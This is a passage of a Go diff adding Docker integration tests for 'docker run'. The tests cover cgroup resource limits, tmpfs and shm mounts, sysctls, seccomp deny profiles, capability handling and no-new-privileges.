+	c.Assert(strings.TrimSpace(out), checker.Equals, "50000")
+
+	out, _ = dockerCmd(c, "run", "--cpu-period", "0", "busybox", "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "100000")
+
+	out = inspectField(c, "test", "HostConfig.CpuPeriod")
+	c.Assert(out, checker.Equals, "50000", check.Commentf("setting the CPU CFS period failed"))
+}
+
+func (s *DockerSuite) TestRunWithInvalidCpuPeriod(c *check.C) {
+	testRequires(c, cpuCfsPeriod)
+	out, _, err := dockerCmdWithError("run", "--cpu-period", "900", "busybox", "true")
+	c.Assert(err, check.NotNil)
+	expected := "CPU cfs period can not be less than 1ms (i.e. 1000) or larger than 1s (i.e. 1000000)"
+	c.Assert(out, checker.Contains, expected)
+
+	out, _, err = dockerCmdWithError("run", "--cpu-period", "2000000", "busybox", "true")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, expected)
+
+	out, _, err = dockerCmdWithError("run", "--cpu-period", "-3", "busybox", "true")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, expected)
+}
+
+func (s *DockerSuite) TestRunWithKernelMemory(c *check.C) {
+	testRequires(c, kernelMemorySupport)
+
+	file := "/sys/fs/cgroup/memory/memory.kmem.limit_in_bytes"
+	stdout, _, _ := dockerCmdWithStdoutStderr(c, "run", "--kernel-memory", "50M", "--name", "test1", "busybox", "cat", file)
+	c.Assert(strings.TrimSpace(stdout), checker.Equals, "52428800")
+
+	out := inspectField(c, "test1", "HostConfig.KernelMemory")
+	c.Assert(out, check.Equals, "52428800")
+}
+
+func (s *DockerSuite) TestRunWithInvalidKernelMemory(c *check.C) {
+	testRequires(c, kernelMemorySupport)
+
+	out, _, err := dockerCmdWithError("run", "--kernel-memory", "2M", "busybox", "true")
+	c.Assert(err, check.NotNil)
+	expected := "Minimum kernel memory limit allowed is 4MB"
+	c.Assert(out, checker.Contains, expected)
+
+	out, _, err = dockerCmdWithError("run", "--kernel-memory", "-16m", "--name", "test2", "busybox", "echo", "test")
+	c.Assert(err, check.NotNil)
+	expected = "invalid size"
+	c.Assert(out, checker.Contains, expected)
+}
+
+func (s *DockerSuite) TestRunWithCPUShares(c *check.C) {
+	testRequires(c, cpuShare)
+
+	file := "/sys/fs/cgroup/cpu/cpu.shares"
+	out, _ := dockerCmd(c, "run", "--cpu-shares", "1000", "--name", "test", "busybox", "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "1000")
+
+	out = inspectField(c, "test", "HostConfig.CPUShares")
+	c.Assert(out, check.Equals, "1000")
+}
+
+// "test" should be printed
+func (s *DockerSuite) TestRunEchoStdoutWithCPUSharesAndMemoryLimit(c *check.C) {
+	testRequires(c, cpuShare)
+	testRequires(c, memoryLimitSupport)
+	out, _, _ := dockerCmdWithStdoutStderr(c, "run", "--cpu-shares", "1000", "-m", "32m", "busybox", "echo", "test")
+	c.Assert(out, checker.Equals, "test\n", check.Commentf("container should've printed 'test'"))
+}
+
+func (s *DockerSuite) TestRunWithCpusetCpus(c *check.C) {
+	testRequires(c, cgroupCpuset)
+
+	file := "/sys/fs/cgroup/cpuset/cpuset.cpus"
+	out, _ := dockerCmd(c, "run", "--cpuset-cpus", "0", "--name", "test", "busybox", "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	out = inspectField(c, "test", "HostConfig.CpusetCpus")
+	c.Assert(out, check.Equals, "0")
+}
+
+func (s *DockerSuite) TestRunWithCpusetMems(c *check.C) {
+	testRequires(c, cgroupCpuset)
+
+	file := "/sys/fs/cgroup/cpuset/cpuset.mems"
+	out, _ := dockerCmd(c, "run", "--cpuset-mems", "0", "--name", "test", "busybox", "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	out = inspectField(c, "test", "HostConfig.CpusetMems")
+	c.Assert(out, check.Equals, "0")
+}
+
+func (s *DockerSuite) TestRunWithBlkioWeight(c *check.C) {
+	testRequires(c, blkioWeight)
+
+	file := "/sys/fs/cgroup/blkio/blkio.weight"
+	out, _ := dockerCmd(c, "run", "--blkio-weight", "300", "--name", "test", "busybox", "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "300")
+
+	out = inspectField(c, "test", "HostConfig.BlkioWeight")
+	c.Assert(out, check.Equals, "300")
+}
+
+func (s *DockerSuite) TestRunWithInvalidBlkioWeight(c *check.C) {
+	testRequires(c, blkioWeight)
+	out, _, err := dockerCmdWithError("run", "--blkio-weight", "5", "busybox", "true")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	expected := "Range of blkio weight is from 10 to 1000"
+	c.Assert(out, checker.Contains, expected)
+}
+
+func (s *DockerSuite) TestRunWithInvalidPathforBlkioWeightDevice(c *check.C) {
+	testRequires(c, blkioWeight)
+	out, _, err := dockerCmdWithError("run", "--blkio-weight-device", "/dev/sdX:100", "busybox", "true")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+}
+
+func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceReadBps(c *check.C) {
+	testRequires(c, blkioWeight)
+	out, _, err := dockerCmdWithError("run", "--device-read-bps", "/dev/sdX:500", "busybox", "true")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+}
+
+func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceWriteBps(c *check.C) {
+	testRequires(c, blkioWeight)
+	out, _, err := dockerCmdWithError("run", "--device-write-bps", "/dev/sdX:500", "busybox", "true")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+}
+
+func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceReadIOps(c *check.C) {
+	testRequires(c, blkioWeight)
+	out, _, err := dockerCmdWithError("run", "--device-read-iops", "/dev/sdX:500", "busybox", "true")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+}
+
+func (s *DockerSuite) TestRunWithInvalidPathforBlkioDeviceWriteIOps(c *check.C) {
+	testRequires(c, blkioWeight)
+	out, _, err := dockerCmdWithError("run", "--device-write-iops", "/dev/sdX:500", "busybox", "true")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+}
+
+func (s *DockerSuite) TestRunOOMExitCode(c *check.C) {
+	testRequires(c, memoryLimitSupport, swapMemorySupport)
+	errChan := make(chan error)
+	go func() {
+		defer close(errChan)
+		out, exitCode, _ := dockerCmdWithError("run", "-m", "4MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done")
+		if expected := 137; exitCode != expected {
+			errChan <- fmt.Errorf("wrong exit code for OOM container: expected %d, got %d (output: %q)", expected, exitCode, out)
+		}
+	}()
+
+	select {
+	case err := <-errChan:
+		c.Assert(err, check.IsNil)
+	case <-time.After(600 * time.Second):
+		c.Fatal("Timeout waiting for container to die on OOM")
+	}
+}
+
+func (s *DockerSuite) TestRunWithMemoryLimit(c *check.C) {
+	testRequires(c, memoryLimitSupport)
+
+	file := "/sys/fs/cgroup/memory/memory.limit_in_bytes"
+	stdout, _, _ := dockerCmdWithStdoutStderr(c, "run", "-m", "32M", "--name", "test", "busybox", "cat", file)
+	c.Assert(strings.TrimSpace(stdout), checker.Equals, "33554432")
+
+	out := inspectField(c, "test", "HostConfig.Memory")
+	c.Assert(out, check.Equals, "33554432")
+}
+
+// TestRunWithoutMemoryswapLimit sets memory limit and disables swap
+// memory limit, this means the processes in the container can use
+// 16M memory and as much swap memory as they need (if the host
+// supports swap memory).
+func (s *DockerSuite) TestRunWithoutMemoryswapLimit(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, memoryLimitSupport)
+	testRequires(c, swapMemorySupport)
+	dockerCmd(c, "run", "-m", "32m", "--memory-swap", "-1", "busybox", "true")
+}
+
+func (s *DockerSuite) TestRunWithSwappiness(c *check.C) {
+	testRequires(c, memorySwappinessSupport)
+	file := "/sys/fs/cgroup/memory/memory.swappiness"
+	out, _ := dockerCmd(c, "run", "--memory-swappiness", "0", "--name", "test", "busybox", "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	out = inspectField(c, "test", "HostConfig.MemorySwappiness")
+	c.Assert(out, check.Equals, "0")
+}
+
+func (s *DockerSuite) TestRunWithSwappinessInvalid(c *check.C) {
+	testRequires(c, memorySwappinessSupport)
+	out, _, err := dockerCmdWithError("run", "--memory-swappiness", "101", "busybox", "true")
+	c.Assert(err, check.NotNil)
+	expected := "Valid memory swappiness range is 0-100"
+	c.Assert(out, checker.Contains, expected, check.Commentf("Expected output to contain %q, not %q", out, expected))
+
+	out, _, err = dockerCmdWithError("run", "--memory-swappiness", "-10", "busybox", "true")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, expected, check.Commentf("Expected output to contain %q, not %q", out, expected))
+}
+
+func (s *DockerSuite) TestRunWithMemoryReservation(c *check.C) {
+	testRequires(c, memoryReservationSupport)
+
+	file := "/sys/fs/cgroup/memory/memory.soft_limit_in_bytes"
+	out, _ := dockerCmd(c, "run", "--memory-reservation", "200M", "--name", "test", "busybox", "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "209715200")
+
+	out = inspectField(c, "test", "HostConfig.MemoryReservation")
+	c.Assert(out, check.Equals, "209715200")
+}
+
+func (s *DockerSuite) TestRunWithMemoryReservationInvalid(c *check.C) {
+	testRequires(c, memoryLimitSupport)
+	testRequires(c, memoryReservationSupport)
+	out, _, err := dockerCmdWithError("run", "-m", "500M", "--memory-reservation", "800M", "busybox", "true")
+	c.Assert(err, check.NotNil)
+	expected := "Minimum memory limit can not be less than memory reservation limit"
+	c.Assert(strings.TrimSpace(out), checker.Contains, expected, check.Commentf("run container should fail with invalid memory reservation"))
+
+	out, _, err = dockerCmdWithError("run", "--memory-reservation", "1k", "busybox", "true")
+	c.Assert(err, check.NotNil)
+	expected = "Minimum memory reservation allowed is 4MB"
+	c.Assert(strings.TrimSpace(out), checker.Contains, expected, check.Commentf("run container should fail with invalid memory reservation"))
+}
+
+func (s *DockerSuite) TestStopContainerSignal(c *check.C) {
+	out, _ := dockerCmd(c, "run", "--stop-signal", "SIGUSR1", "-d", "busybox", "/bin/sh", "-c", `trap 'echo "exit trapped"; exit 0' USR1; while true; do sleep 1; done`)
+	containerID := strings.TrimSpace(out)
+
+	c.Assert(waitRun(containerID), checker.IsNil)
+
+	dockerCmd(c, "stop", containerID)
+	out, _ = dockerCmd(c, "logs", containerID)
+
+	c.Assert(out, checker.Contains, "exit trapped", check.Commentf("Expected `exit trapped` in the log"))
+}
+
+func (s *DockerSuite) TestRunSwapLessThanMemoryLimit(c *check.C) {
+	testRequires(c, memoryLimitSupport)
+	testRequires(c, swapMemorySupport)
+	out, _, err := dockerCmdWithError("run", "-m", "16m", "--memory-swap", "15m", "busybox", "echo", "test")
+	expected := "Minimum memoryswap limit should be larger than memory limit"
+	c.Assert(err, check.NotNil)
+
+	c.Assert(out, checker.Contains, expected)
+}
+
+func (s *DockerSuite) TestRunInvalidCpusetCpusFlagValue(c *check.C) {
+	testRequires(c, cgroupCpuset, SameHostDaemon)
+
+	sysInfo := sysinfo.New(true)
+	cpus, err := parsers.ParseUintList(sysInfo.Cpus)
+	c.Assert(err, check.IsNil)
+	var invalid int
+	for i := 0; i <= len(cpus)+1; i++ {
+		if !cpus[i] {
+			invalid = i
+			break
+		}
+	}
+	out, _, err := dockerCmdWithError("run", "--cpuset-cpus", strconv.Itoa(invalid), "busybox", "true")
+	c.Assert(err, check.NotNil)
+	expected := fmt.Sprintf("Error response from daemon: Requested CPUs are not available - requested %s, available: %s", strconv.Itoa(invalid), sysInfo.Cpus)
+	c.Assert(out, checker.Contains, expected)
+}
+
+func (s *DockerSuite) TestRunInvalidCpusetMemsFlagValue(c *check.C) {
+	testRequires(c, cgroupCpuset)
+
+	sysInfo := sysinfo.New(true)
+	mems, err := parsers.ParseUintList(sysInfo.Mems)
+	c.Assert(err, check.IsNil)
+	var invalid int
+	for i := 0; i <= len(mems)+1; i++ {
+		if !mems[i] {
+			invalid = i
+			break
+		}
+	}
+	out, _, err := dockerCmdWithError("run", "--cpuset-mems", strconv.Itoa(invalid), "busybox", "true")
+	c.Assert(err, check.NotNil)
+	expected := fmt.Sprintf("Error response from daemon: Requested memory nodes are not available - requested %s, available: %s", strconv.Itoa(invalid), sysInfo.Mems)
+	c.Assert(out, checker.Contains, expected)
+}
+
+func (s *DockerSuite) TestRunInvalidCPUShares(c *check.C) {
+	testRequires(c, cpuShare, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "--cpu-shares", "1", "busybox", "echo", "test")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	expected := "The minimum allowed cpu-shares is 2"
+	c.Assert(out, checker.Contains, expected)
+
+	out, _, err = dockerCmdWithError("run", "--cpu-shares", "-1", "busybox", "echo", "test")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	expected = "shares: invalid argument"
+	c.Assert(out, checker.Contains, expected)
+
+	out, _, err = dockerCmdWithError("run", "--cpu-shares", "99999999", "busybox", "echo", "test")
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	expected = "The maximum allowed cpu-shares is"
+	c.Assert(out, checker.Contains, expected)
+}
+
+func (s *DockerSuite) TestRunWithDefaultShmSize(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	name := "shm-default"
+	out, _ := dockerCmd(c, "run", "--name", name, "busybox", "mount")
+	shmRegex := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=65536k`)
+	if !shmRegex.MatchString(out) {
+		c.Fatalf("Expected shm of 64MB in mount command, got %v", out)
+	}
+	shmSize := inspectField(c, name, "HostConfig.ShmSize")
+	c.Assert(shmSize, check.Equals, "67108864")
+}
+
+func (s *DockerSuite) TestRunWithShmSize(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	name := "shm"
+	out, _ := dockerCmd(c, "run", "--name", name, "--shm-size=1G", "busybox", "mount")
+	shmRegex := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=1048576k`)
+	if !shmRegex.MatchString(out) {
+		c.Fatalf("Expected shm of 1GB in mount command, got %v", out)
+	}
+	shmSize := inspectField(c, name, "HostConfig.ShmSize")
+	c.Assert(shmSize, check.Equals, "1073741824")
+}
+
+func (s *DockerSuite) TestRunTmpfsMountsEnsureOrdered(c *check.C) {
+	tmpFile, err := ioutil.TempFile("", "test")
+	c.Assert(err, check.IsNil)
+	defer tmpFile.Close()
+	out, _ := dockerCmd(c, "run", "--tmpfs", "/run", "-v", tmpFile.Name()+":/run/test", "busybox", "ls", "/run")
+	c.Assert(out, checker.Contains, "test")
+}
+
+func (s *DockerSuite) TestRunTmpfsMounts(c *check.C) {
+	// TODO Windows (Post TP5): This test cannot run on a Windows daemon as
+	// Windows does not support tmpfs mounts.
+	testRequires(c, DaemonIsLinux)
+	if out, _, err := dockerCmdWithError("run", "--tmpfs", "/run", "busybox", "touch", "/run/somefile"); err != nil {
+		c.Fatalf("/run directory not mounted on tmpfs %q %s", err, out)
+	}
+	if out, _, err := dockerCmdWithError("run", "--tmpfs", "/run:noexec", "busybox", "touch", "/run/somefile"); err != nil {
+		c.Fatalf("/run directory not mounted on tmpfs %q %s", err, out)
+	}
+	if out, _, err := dockerCmdWithError("run", "--tmpfs", "/run:noexec,nosuid,rw,size=5k,mode=700", "busybox", "touch", "/run/somefile"); err != nil {
+		c.Fatalf("/run failed to mount on tmpfs with valid options %q %s", err, out)
+	}
+	if _, _, err := dockerCmdWithError("run", "--tmpfs", "/run:foobar", "busybox", "touch", "/run/somefile"); err == nil {
+		c.Fatalf("/run mounted on tmpfs when it should have vailed within invalid mount option")
+	}
+	if _, _, err := dockerCmdWithError("run", "--tmpfs", "/run", "-v", "/run:/run", "busybox", "touch", "/run/somefile"); err == nil {
+		c.Fatalf("Should have generated an error saying Duplicate mount  points")
+	}
+}
+
+func (s *DockerSuite) TestRunTmpfsMountsOverrideImageVolumes(c *check.C) {
+	name := "img-with-volumes"
+	_, err := buildImage(
+		name,
+		`
+    FROM busybox
+    VOLUME /run
+    RUN touch /run/stuff
+    `,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	out, _ := dockerCmd(c, "run", "--tmpfs", "/run", name, "ls", "/run")
+	c.Assert(out, checker.Not(checker.Contains), "stuff")
+}
+
+// Test case for #22420
+func (s *DockerSuite) TestRunTmpfsMountsWithOptions(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	expectedOptions := []string{"rw", "nosuid", "nodev", "noexec", "relatime"}
+	out, _ := dockerCmd(c, "run", "--tmpfs", "/tmp", "busybox", "sh", "-c", "mount | grep 'tmpfs on /tmp'")
+	for _, option := range expectedOptions {
+		c.Assert(out, checker.Contains, option)
+	}
+	c.Assert(out, checker.Not(checker.Contains), "size=")
+
+	expectedOptions = []string{"rw", "nosuid", "nodev", "noexec", "relatime"}
+	out, _ = dockerCmd(c, "run", "--tmpfs", "/tmp:rw", "busybox", "sh", "-c", "mount | grep 'tmpfs on /tmp'")
+	for _, option := range expectedOptions {
+		c.Assert(out, checker.Contains, option)
+	}
+	c.Assert(out, checker.Not(checker.Contains), "size=")
+
+	expectedOptions = []string{"rw", "nosuid", "nodev", "relatime", "size=8192k"}
+	out, _ = dockerCmd(c, "run", "--tmpfs", "/tmp:rw,exec,size=8192k", "busybox", "sh", "-c", "mount | grep 'tmpfs on /tmp'")
+	for _, option := range expectedOptions {
+		c.Assert(out, checker.Contains, option)
+	}
+
+	expectedOptions = []string{"rw", "nosuid", "nodev", "noexec", "relatime", "size=4096k"}
+	out, _ = dockerCmd(c, "run", "--tmpfs", "/tmp:rw,size=8192k,exec,size=4096k,noexec", "busybox", "sh", "-c", "mount | grep 'tmpfs on /tmp'")
+	for _, option := range expectedOptions {
+		c.Assert(out, checker.Contains, option)
+	}
+
+	// We use debian:jessie as there is no findmnt in busybox. Also the output will be in the format of
+	// TARGET PROPAGATION
+	// /tmp   shared
+	// so we only capture `shared` here.
+	expectedOptions = []string{"shared"}
+	out, _ = dockerCmd(c, "run", "--tmpfs", "/tmp:shared", "debian:jessie", "findmnt", "-o", "TARGET,PROPAGATION", "/tmp")
+	for _, option := range expectedOptions {
+		c.Assert(out, checker.Contains, option)
+	}
+}
+
+func (s *DockerSuite) TestRunSysctls(c *check.C) {
+
+	testRequires(c, DaemonIsLinux)
+	var err error
+
+	out, _ := dockerCmd(c, "run", "--sysctl", "net.ipv4.ip_forward=1", "--name", "test", "busybox", "cat", "/proc/sys/net/ipv4/ip_forward")
+	c.Assert(strings.TrimSpace(out), check.Equals, "1")
+
+	out = inspectFieldJSON(c, "test", "HostConfig.Sysctls")
+
+	sysctls := make(map[string]string)
+	err = json.Unmarshal([]byte(out), &sysctls)
+	c.Assert(err, check.IsNil)
+	c.Assert(sysctls["net.ipv4.ip_forward"], check.Equals, "1")
+
+	out, _ = dockerCmd(c, "run", "--sysctl", "net.ipv4.ip_forward=0", "--name", "test1", "busybox", "cat", "/proc/sys/net/ipv4/ip_forward")
+	c.Assert(strings.TrimSpace(out), check.Equals, "0")
+
+	out = inspectFieldJSON(c, "test1", "HostConfig.Sysctls")
+
+	err = json.Unmarshal([]byte(out), &sysctls)
+	c.Assert(err, check.IsNil)
+	c.Assert(sysctls["net.ipv4.ip_forward"], check.Equals, "0")
+
+	runCmd := exec.Command(dockerBinary, "run", "--sysctl", "kernel.foobar=1", "--name", "test2", "busybox", "cat", "/proc/sys/kernel/foobar")
+	out, _, _ = runCommandWithOutput(runCmd)
+	if !strings.Contains(out, "invalid argument") {
+		c.Fatalf("expected --sysctl to fail, got %s", out)
+	}
+}
+
+// TestRunSeccompProfileDenyUnshare checks that 'docker run --security-opt seccomp=/tmp/profile.json debian:jessie unshare' exits with operation not permitted.
+func (s *DockerSuite) TestRunSeccompProfileDenyUnshare(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled, NotArm, Apparmor)
+	jsonData := `{
+	"defaultAction": "SCMP_ACT_ALLOW",
+	"syscalls": [
+		{
+			"name": "unshare",
+			"action": "SCMP_ACT_ERRNO"
+		}
+	]
+}`
+	tmpFile, err := ioutil.TempFile("", "profile.json")
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer tmpFile.Close()
+
+	if _, err := tmpFile.Write([]byte(jsonData)); err != nil {
+		c.Fatal(err)
+	}
+	runCmd := exec.Command(dockerBinary, "run", "--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(), "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc")
+	out, _, _ := runCommandWithOutput(runCmd)
+	if !strings.Contains(out, "Operation not permitted") {
+		c.Fatalf("expected unshare with seccomp profile denied to fail, got %s", out)
+	}
+}
+
+// TestRunSeccompProfileDenyChmod checks that 'docker run --security-opt seccomp=/tmp/profile.json busybox chmod 400 /etc/hostname' exits with operation not permitted.
+func (s *DockerSuite) TestRunSeccompProfileDenyChmod(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled)
+	jsonData := `{
+	"defaultAction": "SCMP_ACT_ALLOW",
+	"syscalls": [
+		{
+			"name": "chmod",
+			"action": "SCMP_ACT_ERRNO"
+		},
+		{
+			"name":"fchmod",
+			"action": "SCMP_ACT_ERRNO"
+		},
+		{
+			"name": "fchmodat",
+			"action":"SCMP_ACT_ERRNO"
+		}
+	]
+}`
+	tmpFile, err := ioutil.TempFile("", "profile.json")
+	c.Assert(err, check.IsNil)
+	defer tmpFile.Close()
+
+	if _, err := tmpFile.Write([]byte(jsonData)); err != nil {
+		c.Fatal(err)
+	}
+	runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "400", "/etc/hostname")
+	out, _, _ := runCommandWithOutput(runCmd)
+	if !strings.Contains(out, "Operation not permitted") {
+		c.Fatalf("expected chmod with seccomp profile denied to fail, got %s", out)
+	}
+}
+
+// TestRunSeccompProfileDenyUnshareUserns checks that 'docker run debian:jessie unshare --map-root-user --user sh -c whoami' with a specific profile to
+// deny unhare of a userns exits with operation not permitted.
+func (s *DockerSuite) TestRunSeccompProfileDenyUnshareUserns(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled, NotArm, Apparmor)
+	// from sched.h
+	jsonData := fmt.Sprintf(`{
+	"defaultAction": "SCMP_ACT_ALLOW",
+	"syscalls": [
+		{
+			"name": "unshare",
+			"action": "SCMP_ACT_ERRNO",
+			"args": [
+				{
+					"index": 0,
+					"value": %d,
+					"op": "SCMP_CMP_EQ"
+				}
+			]
+		}
+	]
+}`, uint64(0x10000000))
+	tmpFile, err := ioutil.TempFile("", "profile.json")
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer tmpFile.Close()
+
+	if _, err := tmpFile.Write([]byte(jsonData)); err != nil {
+		c.Fatal(err)
+	}
+	runCmd := exec.Command(dockerBinary, "run", "--security-opt", "apparmor=unconfined", "--security-opt", "seccomp="+tmpFile.Name(), "debian:jessie", "unshare", "--map-root-user", "--user", "sh", "-c", "whoami")
+	out, _, _ := runCommandWithOutput(runCmd)
+	if !strings.Contains(out, "Operation not permitted") {
+		c.Fatalf("expected unshare userns with seccomp profile denied to fail, got %s", out)
+	}
+}
+
+// TestRunSeccompProfileDenyCloneUserns checks that 'docker run syscall-test'
+// with a the default seccomp profile exits with operation not permitted.
+func (s *DockerSuite) TestRunSeccompProfileDenyCloneUserns(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled)
+	ensureSyscallTest(c)
+
+	runCmd := exec.Command(dockerBinary, "run", "syscall-test", "userns-test", "id")
+	out, _, err := runCommandWithOutput(runCmd)
+	if err == nil || !strings.Contains(out, "clone failed: Operation not permitted") {
+		c.Fatalf("expected clone userns with default seccomp profile denied to fail, got %s: %v", out, err)
+	}
+}
+
+// TestRunSeccompUnconfinedCloneUserns checks that
+// 'docker run --security-opt seccomp=unconfined syscall-test' allows creating a userns.
+func (s *DockerSuite) TestRunSeccompUnconfinedCloneUserns(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled, UserNamespaceInKernel, NotUserNamespace, unprivilegedUsernsClone)
+	ensureSyscallTest(c)
+
+	// make sure running w privileged is ok
+	runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "syscall-test", "userns-test", "id")
+	if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "nobody") {
+		c.Fatalf("expected clone userns with --security-opt seccomp=unconfined to succeed, got %s: %v", out, err)
+	}
+}
+
+// TestRunSeccompAllowPrivCloneUserns checks that 'docker run --privileged syscall-test'
+// allows creating a userns.
+func (s *DockerSuite) TestRunSeccompAllowPrivCloneUserns(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled, UserNamespaceInKernel, NotUserNamespace)
+	ensureSyscallTest(c)
+
+	// make sure running w privileged is ok
+	runCmd := exec.Command(dockerBinary, "run", "--privileged", "syscall-test", "userns-test", "id")
+	if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "nobody") {
+		c.Fatalf("expected clone userns with --privileged to succeed, got %s: %v", out, err)
+	}
+}
+
+// TestRunSeccompProfileAllow32Bit checks that 32 bit code can run on x86_64
+// with the default seccomp profile.
+func (s *DockerSuite) TestRunSeccompProfileAllow32Bit(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled, IsAmd64)
+	ensureSyscallTest(c)
+
+	runCmd := exec.Command(dockerBinary, "run", "syscall-test", "exit32-test", "id")
+	if out, _, err := runCommandWithOutput(runCmd); err != nil {
+		c.Fatalf("expected to be able to run 32 bit code, got %s: %v", out, err)
+	}
+}
+
+// TestRunSeccompAllowSetrlimit checks that 'docker run debian:jessie ulimit -v 1048510' succeeds.
+func (s *DockerSuite) TestRunSeccompAllowSetrlimit(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled)
+
+	// ulimit uses setrlimit, so we want to make sure we don't break it
+	runCmd := exec.Command(dockerBinary, "run", "debian:jessie", "bash", "-c", "ulimit -v 1048510")
+	if out, _, err := runCommandWithOutput(runCmd); err != nil {
+		c.Fatalf("expected ulimit with seccomp to succeed, got %s: %v", out, err)
+	}
+}
+
+func (s *DockerSuite) TestRunSeccompDefaultProfileAcct(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled, NotUserNamespace)
+	ensureSyscallTest(c)
+
+	out, _, err := dockerCmdWithError("run", "syscall-test", "acct-test")
+	if err == nil || !strings.Contains(out, "Operation not permitted") {
+		c.Fatalf("test 0: expected Operation not permitted, got: %s", out)
+	}
+
+	out, _, err = dockerCmdWithError("run", "--cap-add", "sys_admin", "syscall-test", "acct-test")
+	if err == nil || !strings.Contains(out, "Operation not permitted") {
+		c.Fatalf("test 1: expected Operation not permitted, got: %s", out)
+	}
+
+	out, _, err = dockerCmdWithError("run", "--cap-add", "sys_pacct", "syscall-test", "acct-test")
+	if err == nil || !strings.Contains(out, "No such file or directory") {
+		c.Fatalf("test 2: expected No such file or directory, got: %s", out)
+	}
+
+	out, _, err = dockerCmdWithError("run", "--cap-add", "ALL", "syscall-test", "acct-test")
+	if err == nil || !strings.Contains(out, "No such file or directory") {
+		c.Fatalf("test 3: expected No such file or directory, got: %s", out)
+	}
+
+	out, _, err = dockerCmdWithError("run", "--cap-drop", "ALL", "--cap-add", "sys_pacct", "syscall-test", "acct-test")
+	if err == nil || !strings.Contains(out, "No such file or directory") {
+		c.Fatalf("test 4: expected No such file or directory, got: %s", out)
+	}
+}
+
+func (s *DockerSuite) TestRunSeccompDefaultProfileNS(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled, NotUserNamespace)
+	ensureSyscallTest(c)
+
+	out, _, err := dockerCmdWithError("run", "syscall-test", "ns-test", "echo", "hello0")
+	if err == nil || !strings.Contains(out, "Operation not permitted") {
+		c.Fatalf("test 0: expected Operation not permitted, got: %s", out)
+	}
+
+	out, _, err = dockerCmdWithError("run", "--cap-add", "sys_admin", "syscall-test", "ns-test", "echo", "hello1")
+	if err != nil || !strings.Contains(out, "hello1") {
+		c.Fatalf("test 1: expected hello1, got: %s, %v", out, err)
+	}
+
+	out, _, err = dockerCmdWithError("run", "--cap-drop", "all", "--cap-add", "sys_admin", "syscall-test", "ns-test", "echo", "hello2")
+	if err != nil || !strings.Contains(out, "hello2") {
+		c.Fatalf("test 2: expected hello2, got: %s, %v", out, err)
+	}
+
+	out, _, err = dockerCmdWithError("run", "--cap-add", "ALL", "syscall-test", "ns-test", "echo", "hello3")
+	if err != nil || !strings.Contains(out, "hello3") {
+		c.Fatalf("test 3: expected hello3, got: %s, %v", out, err)
+	}
+
+	out, _, err = dockerCmdWithError("run", "--cap-add", "ALL", "--security-opt", "seccomp=unconfined", "syscall-test", "acct-test")
+	if err == nil || !strings.Contains(out, "No such file or directory") {
+		c.Fatalf("test 4: expected No such file or directory, got: %s", out)
+	}
+
+	out, _, err = dockerCmdWithError("run", "--cap-add", "ALL", "--security-opt", "seccomp=unconfined", "syscall-test", "ns-test", "echo", "hello4")
+	if err != nil || !strings.Contains(out, "hello4") {
+		c.Fatalf("test 5: expected hello4, got: %s, %v", out, err)
+	}
+}
+
+// TestRunNoNewPrivSetuid checks that --security-opt=no-new-privileges prevents
+// effective uid transtions on executing setuid binaries.
+func (s *DockerSuite) TestRunNoNewPrivSetuid(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, SameHostDaemon)
+	ensureNNPTest(c)
+
+	// test that running a setuid binary results in no effective uid transition
+	runCmd := exec.Command(dockerBinary, "run", "--security-opt", "no-new-privileges", "--user", "1000", "nnp-test", "/usr/bin/nnp-test")
+	if out, _, err := runCommandWithOutput(runCmd); err != nil || !strings.Contains(out, "EUID=1000") {
